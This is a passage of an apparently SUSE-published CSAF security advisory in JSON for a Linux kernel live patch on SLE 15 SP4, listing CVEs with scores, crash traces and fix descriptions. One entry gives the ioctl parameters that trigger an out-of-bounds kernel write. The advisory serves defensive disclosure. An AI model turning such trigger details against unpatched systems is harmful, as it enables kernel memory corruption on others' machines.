"text": "\nThis update for the SUSE Linux Enterprise Kernel 5.14.21-150400.24.150 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1046,SUSE-SLE-Module-Live-Patching-15-SP4-2026-1046",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1046-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1046-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261046-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1046-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024929.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1254755",
"url": "https://bugzilla.suse.com/1254755"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53781 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53781/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 36 for SUSE Linux Enterprise 15 SP4)",
"tracking": {
"current_release_date": "2026-03-25T19:34:09Z",
"generator": {
"date": "2026-03-25T19:34:09Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1046-1",
"initial_release_date": "2026-03-25T19:34:09Z",
"revision_history": [
{
"date": "2026-03-25T19:34:09Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"product_id": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64",
"product_id": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP4",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp4"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP4",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le"
},
"product_reference": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x as component of SUSE Linux Enterprise Live Patching 15 SP4",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x"
},
"product_reference": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP4",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
},
"product_reference": "kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2023-53781",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53781"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Fix use-after-free in tcp_write_timer_handler().\n\nWith Eric\u0027s ref tracker, syzbot finally found a repro for\nuse-after-free in tcp_write_timer_handler() by kernel TCP\nsockets. [0]\n\nIf SMC creates a kernel socket in __smc_create(), the kernel\nsocket is supposed to be freed in smc_clcsock_release() by\ncalling sock_release() when we close() the parent SMC socket.\n\nHowever, at the end of smc_clcsock_release(), the kernel\nsocket\u0027s sk_state might not be TCP_CLOSE. This means that\nwe have not called inet_csk_destroy_sock() in __tcp_close()\nand have not stopped the TCP timers.\n\nThe kernel socket\u0027s TCP timers can be fired later, so we\nneed to hold a refcnt for net as we do for MPTCP subflows\nin mptcp_subflow_create_socket().\n\n[0]:\nleaked reference.\n sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108)\n inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244)\n __sock_create (net/socket.c:1546)\n smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284)\n __sock_create (net/socket.c:1546)\n __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661)\n __x64_sys_socket (net/socket.c:1672)\n do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)\n==================================================================\nBUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\nRead of size 1 at addr ffff888052b65e0d by task syzrepro/18091\n\nCPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl (lib/dump_stack.c:107)\n print_report (mm/kasan/report.c:320 mm/kasan/report.c:430)\n kasan_report (mm/kasan/report.c:538)\n tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\n tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643)\n call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701)\n __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022)\n run_timer_softirq (kernel/time/timer.c:2037)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572)\n __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650)\n irq_exit_rcu (kernel/softirq.c:664)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53781",
"url": "https://www.suse.com/security/cve/CVE-2023-53781"
},
{
"category": "external",
"summary": "SUSE Bug 1254751 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254751"
},
{
"category": "external",
"summary": "SUSE Bug 1254755 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2023-53781"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T19:34:09Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
